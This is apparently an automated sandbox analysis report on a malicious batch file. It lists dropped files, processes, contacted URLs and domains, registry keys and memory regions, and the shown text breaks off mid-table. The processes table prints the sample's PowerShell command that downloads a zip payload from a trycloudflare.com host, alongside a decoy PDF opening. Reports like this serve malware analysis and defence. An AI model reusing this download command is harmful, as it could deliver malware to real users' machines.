Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
__5A1AACAD-4F60-4DC8-94AA-4866010B7794_.bat
|
Unicode text, UTF-8 text, with very long lines (1438), with CRLF line terminators
|
initial sample
|
||
C:\Users\user\Downloads\toto.zip
|
Zip archive data, at least v2.0 to extract, compression method=store
|
modified
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\94afc737-04dd-4927-a105-35c9c220d018.tmp
|
JSON data
|
modified
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
|
Certificate, Version=3
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6256
|
PostScript document text
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 19
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MSIe3faf.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15wfupuq.nzp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dapngs1.jvo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brouqlje.ghs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quwxdlf1.bpl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-25 13-50-21-147.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrocef_low\3cbc38a8-0d23-4ccd-af57-d042de07433d.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1647188
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrocef_low\4a1b048d-f4e0-4c24-866c-997655eaf784.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrocef_low\b9ae2720-a692-4925-a7ea-946b80190635.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\acrocef_low\e99d25c5-bd96-4214-96ea-b6bff979bbcd.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
\Device\Null
|
ASCII text, with CRLF line terminators, with overstriking
|
dropped
|
There are 42 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\__5A1AACAD-4F60-4DC8-94AA-4866010B7794_.bat" "
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest
-Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch
{ exit 1 }"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest
-Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch
{ exit 1 }"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\DUUDTUBZFW.pdf"
|
||
C:\Windows\System32\timeout.exe
|
timeout /t 5
|
||
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log"
--mojo-platform-channel-handle=2100 --field-trial-handle=1524,i,13191732678988817779,5273796738315577803,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://retailer-indicators-resume-key.trycloudflare.com/toto.zip
|
104.16.230.132
|
||
https://retailer-indicators-resume-key.trycloudfla
|
unknown
|
||
https://retailer-indicators-resume-key.trycloudflare.com
|
unknown
|
||
https://retailer-indicators-resume-key.trycloudflare.com/toto.zipW3
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://x1.i.lencr.org/
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://microft.com/pkt7
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://retailer-indicators-resume-key.trycloudflare.com/toto.zipb
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://retailer-indicators-resume-key.trycloudflare.com/toto.zip?
|
unknown
|
||
https://retailer-indicators-resume-key.trycloudflare.com/toto.zip9
|
unknown
|
||
https://retailer-indicators-resume-key.trycloudflare.com/update.bat
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://retailer-indicators-resume-key.trycloudflare.com
|
unknown
|
||
https://retailer-indicators-resume-key.trycloudflare.com/toto.zip7
|
unknown
|
||
https://retailer-indicators-resume-key.trycloudflare.com/toto.zipeoy
|
unknown
|
There are 14 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
retailer-indicators-resume-key.trycloudflare.com
|
104.16.230.132
|
||
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
|
217.20.57.34
|
||
x1.i.lencr.org
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
104.16.230.132
|
retailer-indicators-resume-key.trycloudflare.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 7 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1E42EB52000
|
trusted library allocation
|
page read and write
|
||
1E42F05F000
|
trusted library allocation
|
page read and write
|
||
965468F000
|
stack
|
page read and write
|
||
1E42F056000
|
trusted library allocation
|
page read and write
|
||
1E42E733000
|
trusted library allocation
|
page read and write
|
||
1E42F3CC000
|
trusted library allocation
|
page read and write
|
||
26C65010000
|
heap
|
page read and write
|
||
1E7F4C7F000
|
heap
|
page read and write
|
||
1E42E179000
|
trusted library allocation
|
page read and write
|
||
1E7DE3DE000
|
trusted library allocation
|
page read and write
|
||
1E7DE3DB000
|
trusted library allocation
|
page read and write
|
||
1E42D652000
|
trusted library allocation
|
page read and write
|
||
1E42DFCA000
|
trusted library allocation
|
page read and write
|
||
1E42DE7E000
|
trusted library allocation
|
page read and write
|
||
1E42E22F000
|
trusted library allocation
|
page read and write
|
||
1E42EE98000
|
trusted library allocation
|
page read and write
|
||
1E42DE66000
|
trusted library allocation
|
page read and write
|
||
1E42F014000
|
trusted library allocation
|
page read and write
|
||
1E7DE012000
|
trusted library allocation
|
page read and write
|
||
1E445354000
|
heap
|
page read and write
|
||
7FF83C760000
|
trusted library allocation
|
page read and write
|
||
1E7DE575000
|
trusted library allocation
|
page read and write
|
||
96535FD000
|
stack
|
page read and write
|
||
1E7DDFFA000
|
trusted library allocation
|
page read and write
|
||
1E42F3AB000
|
trusted library allocation
|
page read and write
|
||
1E42E715000
|
trusted library allocation
|
page read and write
|
||
1E7F4A6F000
|
heap
|
page read and write
|
||
1E42ED1C000
|
trusted library allocation
|
page read and write
|
||
675E5BE000
|
stack
|
page read and write
|
||
1E7DDBAE000
|
trusted library allocation
|
page read and write
|
||
1E42E587000
|
trusted library allocation
|
page read and write
|
||
1E42E572000
|
trusted library allocation
|
page read and write
|
||
1E7DD31C000
|
trusted library allocation
|
page read and write
|
||
1E7DDA89000
|
trusted library allocation
|
page read and write
|
||
1E7DDA83000
|
trusted library allocation
|
page read and write
|
||
1E7DE1FC000
|
trusted library allocation
|
page read and write
|
||
1E42DE57000
|
trusted library allocation
|
page read and write
|
||
7FF83C4D0000
|
trusted library allocation
|
page read and write
|
||
1E42D65D000
|
trusted library allocation
|
page read and write
|
||
1E7DE1F9000
|
trusted library allocation
|
page read and write
|
||
7FF83C6B0000
|
trusted library allocation
|
page execute and read and write
|
||
1E7DE208000
|
trusted library allocation
|
page read and write
|
||
1E42E009000
|
trusted library allocation
|
page read and write
|
||
1E7DE217000
|
trusted library allocation
|
page read and write
|
||
1E42E238000
|
trusted library allocation
|
page read and write
|
||
1E42DFD0000
|
trusted library allocation
|
page read and write
|
||
1E42E015000
|
trusted library allocation
|
page read and write
|
||
1E7DD985000
|
trusted library allocation
|
page read and write
|
||
1E42B3AB000
|
heap
|
page read and write
|
||
1E42DE15000
|
trusted library allocation
|
page read and write
|
||
1E7DCC18000
|
trusted library allocation
|
page read and write
|
||
1E42B566000
|
heap
|
page read and write
|
||
1E42E3CF000
|
trusted library allocation
|
page read and write
|
||
7FF83C57C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83C790000
|
trusted library allocation
|
page read and write
|
||
1E42E411000
|
trusted library allocation
|
page read and write
|
||
7FF83C810000
|
trusted library allocation
|
page read and write
|
||
1E42EE71000
|
trusted library allocation
|
page read and write
|
||
1E42E721000
|
trusted library allocation
|
page read and write
|
||
1E42F071000
|
trusted library allocation
|
page read and write
|
||
1E42ED01000
|
trusted library allocation
|
page read and write
|
||
1E7DE1FF000
|
trusted library allocation
|
page read and write
|
||
1E42DFE2000
|
trusted library allocation
|
page read and write
|
||
1E42F017000
|
trusted library allocation
|
page read and write
|
||
1E7DC574000
|
heap
|
page read and write
|
||
1E42B4D0000
|
trusted library allocation
|
page read and write
|
||
1E42E781000
|
trusted library allocation
|
page read and write
|
||
1E42F032000
|
trusted library allocation
|
page read and write
|
||
1E42EEBC000
|
trusted library allocation
|
page read and write
|
||
1E7DDBB4000
|
trusted library allocation
|
page read and write
|
||
1E7DD8EC000
|
trusted library allocation
|
page read and write
|
||
1E42E760000
|
trusted library allocation
|
page read and write
|
||
1E7DAA0B000
|
heap
|
page read and write
|
||
1E7DD979000
|
trusted library allocation
|
page read and write
|
||
1E42E976000
|
trusted library allocation
|
page read and write
|
||
1E42EECB000
|
trusted library allocation
|
page read and write
|
||
1E42B30F000
|
heap
|
page read and write
|
||
1E7DDDDD000
|
trusted library allocation
|
page read and write
|
||
1E42EE9E000
|
trusted library allocation
|
page read and write
|
||
1E44538D000
|
heap
|
page read and write
|
||
1E42EE65000
|
trusted library allocation
|
page read and write
|
||
1E42ECF8000
|
trusted library allocation
|
page read and write
|
||
1E42F068000
|
trusted library allocation
|
page read and write
|
||
1E42F3F6000
|
trusted library allocation
|
page read and write
|
||
1E42EB1F000
|
trusted library allocation
|
page read and write
|
||
1E42DC99000
|
trusted library allocation
|
page read and write
|
||
1E42F04A000
|
trusted library allocation
|
page read and write
|
||
1E7DABC0000
|
trusted library allocation
|
page read and write
|
||
1E7DE55D000
|
trusted library allocation
|
page read and write
|
||
1E42E751000
|
trusted library allocation
|
page read and write
|
||
1E42EB07000
|
trusted library allocation
|
page read and write
|
||
7FF83C6AA000
|
trusted library allocation
|
page read and write
|
||
1E7DC8C1000
|
trusted library allocation
|
page read and write
|
||
1E7DDBA2000
|
trusted library allocation
|
page read and write
|
||
1E42EB73000
|
trusted library allocation
|
page read and write
|
||
1E42DC63000
|
trusted library allocation
|
page read and write
|
||
1E42EB5E000
|
trusted library allocation
|
page read and write
|
||
1E42ED04000
|
trusted library allocation
|
page read and write
|
||
1E42E952000
|
trusted library allocation
|
page read and write
|
||
1E42ECB9000
|
trusted library allocation
|
page read and write
|
||
675F08E000
|
stack
|
page read and write
|
||
1E445570000
|
heap
|
page read and write
|
||
1E44534A000
|
heap
|
page read and write
|
||
1E42EEB6000
|
trusted library allocation
|
page read and write
|
||
1E42E1F9000
|
trusted library allocation
|
page read and write
|
||
1E42EB25000
|
trusted library allocation
|
page read and write
|
||
1E7DE59F000
|
trusted library allocation
|
page read and write
|
||
1E42DCC3000
|
trusted library allocation
|
page read and write
|
||
1E7DA9CB000
|
heap
|
page read and write
|
||
1E42EE74000
|
trusted library allocation
|
page read and write
|
||
1E7DDA98000
|
trusted library allocation
|
page read and write
|
||
1E42E265000
|
trusted library allocation
|
page read and write
|
||
1E7DE22C000
|
trusted library allocation
|
page read and write
|
||
1E42E241000
|
trusted library allocation
|
page read and write
|
||
1E42DFE5000
|
trusted library allocation
|
page read and write
|
||
1E42E3E1000
|
trusted library allocation
|
page read and write
|
||
1E42DFD3000
|
trusted library allocation
|
page read and write
|
||
1E7DCC0A000
|
trusted library allocation
|
page read and write
|
||
1E42E268000
|
trusted library allocation
|
page read and write
|
||
1E42E5A2000
|
trusted library allocation
|
page read and write
|
||
7FF83C6B0000
|
trusted library allocation
|
page execute and read and write
|
||
1E7DDFFD000
|
trusted library allocation
|
page read and write
|
||
7FF83C6C0000
|
trusted library allocation
|
page execute and read and write
|
||
1E42EB3D000
|
trusted library allocation
|
page read and write
|
||
1E42ECBF000
|
trusted library allocation
|
page read and write
|
||
7FF83C680000
|
trusted library allocation
|
page execute and read and write
|
||
1E7DE578000
|
trusted library allocation
|
page read and write
|
||
C09E6CC000
|
stack
|
page read and write
|
||
1E7DC3F0000
|
trusted library allocation
|
page read and write
|
||
1E7DD5BC000
|
trusted library allocation
|
page read and write
|
||
1E7DE104000
|
trusted library allocation
|
page read and write
|
||
1E7DD964000
|
trusted library allocation
|
page read and write
|
||
7FF83C4F3000
|
trusted library allocation
|
page execute and read and write
|
||
1E42E74B000
|
trusted library allocation
|
page read and write
|
||
1E7DE211000
|
trusted library allocation
|
page read and write
|
||
1E7DE000000
|
trusted library allocation
|
page read and write
|
||
1E42F08C000
|
trusted library allocation
|
page read and write
|
||
1E42E99A000
|
trusted library allocation
|
page read and write
|
||
1E42F3BA000
|
trusted library allocation
|
page read and write
|
||
965377E000
|
stack
|
page read and write
|
||
1E42ECCE000
|
trusted library allocation
|
page read and write
|
||
1E7DDCAC000
|
trusted library allocation
|
page read and write
|
||
1E7DE3ED000
|
trusted library allocation
|
page read and write
|
||
1E42EED4000
|
trusted library allocation
|
page read and write
|
||
1E7DE128000
|
trusted library allocation
|
page read and write
|
||
1E42F089000
|
trusted library allocation
|
page read and write
|
||
7FF83C6C0000
|
trusted library allocation
|
page read and write
|
||
1E42E3C3000
|
trusted library allocation
|
page read and write
|
||
1E42EED1000
|
trusted library allocation
|
page read and write
|
||
7FF83C710000
|
trusted library allocation
|
page read and write
|
||
1E42DCBD000
|
trusted library allocation
|
page read and write
|
||
1E7DC4F6000
|
heap
|
page execute and read and write
|
||
1E42E994000
|
trusted library allocation
|
page read and write
|
||
1E43D319000
|
trusted library allocation
|
page read and write
|
||
1E42F038000
|
trusted library allocation
|
page read and write
|
||
7FF83C7D0000
|
trusted library allocation
|
page read and write
|
||
1E7DD6BA000
|
trusted library allocation
|
page read and write
|
||
1E7DE0F5000
|
trusted library allocation
|
page read and write
|
||
7FF83C690000
|
trusted library allocation
|
page execute and read and write
|
||
1E7DE214000
|
trusted library allocation
|
page read and write
|
||
1E42D290000
|
heap
|
page read and write
|
||
1E42DE72000
|
trusted library allocation
|
page read and write
|
||
1E42E5D2000
|
trusted library allocation
|
page read and write
|
||
1E42F3F3000
|
trusted library allocation
|
page read and write
|
||
1E42E72A000
|
trusted library allocation
|
page read and write
|
||
7FF83C830000
|
trusted library allocation
|
page read and write
|
||
1E42E76F000
|
trusted library allocation
|
page read and write
|
||
1E7DE58D000
|
trusted library allocation
|
page read and write
|
||
1E42ECEC000
|
trusted library allocation
|
page read and write
|
||
7FF83C5B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83C50B000
|
trusted library allocation
|
page read and write
|
||
1E42ECD7000
|
trusted library allocation
|
page read and write
|
||
1E7DDA92000
|
trusted library allocation
|
page read and write
|
||
1E7DD970000
|
trusted library allocation
|
page read and write
|
||
1E42F22F000
|
trusted library allocation
|
page read and write
|
||
1E7DE116000
|
trusted library allocation
|
page read and write
|
||
1E42B4F0000
|
trusted library allocation
|
page read and write
|
||
1E7DE0F8000
|
trusted library allocation
|
page read and write
|
||
1E42F047000
|
trusted library allocation
|
page read and write
|
||
1E42F39F000
|
trusted library allocation
|
page read and write
|
||
1E42ECFB000
|
trusted library allocation
|
page read and write
|
||
7FF83C780000
|
trusted library allocation
|
page read and write
|
||
1E7DD6C6000
|
trusted library allocation
|
page read and write
|
||
1E7DE39F000
|
trusted library allocation
|
page read and write
|
||
1E42F05C000
|
trusted library allocation
|
page read and write
|
||
1E42ED22000
|
trusted library allocation
|
page read and write
|
||
1E42EE7A000
|
trusted library allocation
|
page read and write
|
||
1E7F4BD0000
|
heap
|
page execute and read and write
|
||
1E42EB6A000
|
trusted library allocation
|
page read and write
|
||
1E7DE3D5000
|
trusted library allocation
|
page read and write
|
||
1E42E593000
|
trusted library allocation
|
page read and write
|
||
1E42F244000
|
trusted library allocation
|
page read and write
|
||
1E42B33B000
|
heap
|
page read and write
|
||
1E42E20E000
|
trusted library allocation
|
page read and write
|
||
1E7DAB50000
|
heap
|
page read and write
|
||
1E7DDDC5000
|
trusted library allocation
|
page read and write
|
||
1E7DDEB7000
|
trusted library allocation
|
page read and write
|
||
1E42F381000
|
trusted library allocation
|
page read and write
|
||
1E42DFD9000
|
trusted library allocation
|
page read and write
|
||
1E7DDEF9000
|
trusted library allocation
|
page read and write
|
||
1E42E754000
|
trusted library allocation
|
page read and write
|
||
1E7DDCD0000
|
trusted library allocation
|
page read and write
|
||
1E42F026000
|
trusted library allocation
|
page read and write
|
||
1E7DE3BD000
|
trusted library allocation
|
page read and write
|
||
1E42DFFD000
|
trusted library allocation
|
page read and write
|
||
1E42DCB7000
|
trusted library allocation
|
page read and write
|
||
1E42DE75000
|
trusted library allocation
|
page read and write
|
||
1E42F02F000
|
trusted library allocation
|
page read and write
|
||
1E42F21A000
|
trusted library allocation
|
page read and write
|
||
1E42DCAB000
|
trusted library allocation
|
page read and write
|
||
1E42E02D000
|
trusted library allocation
|
page read and write
|
||
1E4452D7000
|
heap
|
page read and write
|
||
1E7F49D0000
|
heap
|
page read and write
|
||
1E43D2B0000
|
trusted library allocation
|
page read and write
|
||
1E42E75A000
|
trusted library allocation
|
page read and write
|
||
1E42E003000
|
trusted library allocation
|
page read and write
|
||
1E42F3A8000
|
trusted library allocation
|
page read and write
|
||
1E7DAA06000
|
heap
|
page read and write
|
||
1E7DA9BF000
|
heap
|
page read and write
|
||
1E42E730000
|
trusted library allocation
|
page read and write
|
||
7FF83C6E0000
|
trusted library allocation
|
page read and write
|
||
1E4455BA000
|
heap
|
page read and write
|
||
1E445391000
|
heap
|
page read and write
|
||
1E42EE6B000
|
trusted library allocation
|
page read and write
|
||
1E42E3F0000
|
trusted library allocation
|
page read and write
|
||
1E7DDFD9000
|
trusted library allocation
|
page read and write
|
||
1E42E5BA000
|
trusted library allocation
|
page read and write
|
||
1E7DDCCD000
|
trusted library allocation
|
page read and write
|
||
1E42E772000
|
trusted library allocation
|
page read and write
|
||
1E42E9A3000
|
trusted library allocation
|
page read and write
|
||
1E42E40E000
|
trusted library allocation
|
page read and write
|
||
1E7DDEEA000
|
trusted library allocation
|
page read and write
|
||
1E42F1F9000
|
trusted library allocation
|
page read and write
|
||
1E7DD32E000
|
trusted library allocation
|
page read and write
|
||
1E7DE23B000
|
trusted library allocation
|
page read and write
|
||
7FF83C6A1000
|
trusted library allocation
|
page read and write
|
||
1E42E3B7000
|
trusted library allocation
|
page read and write
|
||
1E42E5A5000
|
trusted library allocation
|
page read and write
|
||
675E0FF000
|
stack
|
page read and write
|
||
1E42DFDF000
|
trusted library allocation
|
page read and write
|
||
1E7DA930000
|
heap
|
page read and write
|
||
1E7F4C3F000
|
heap
|
page read and write
|
||
1E42E033000
|
trusted library allocation
|
page read and write
|
||
1E42ECF5000
|
trusted library allocation
|
page read and write
|
||
1E42E9A0000
|
trusted library allocation
|
page read and write
|
||
1E7DE22F000
|
trusted library allocation
|
page read and write
|
||
1E7DD5B3000
|
trusted library allocation
|
page read and write
|
||
1E7DE587000
|
trusted library allocation
|
page read and write
|
||
1E7DE11C000
|
trusted library allocation
|
page read and write
|
||
675E27E000
|
stack
|
page read and write
|
||
1E42ECE0000
|
trusted library allocation
|
page read and write
|
||
1E42E56F000
|
trusted library allocation
|
page read and write
|
||
1E42ECE9000
|
trusted library allocation
|
page read and write
|
||
1E42EB49000
|
trusted library allocation
|
page read and write
|
||
1E42E3F9000
|
trusted library allocation
|
page read and write
|
||
1E42F211000
|
trusted library allocation
|
page read and write
|
||
1E7DDFEB000
|
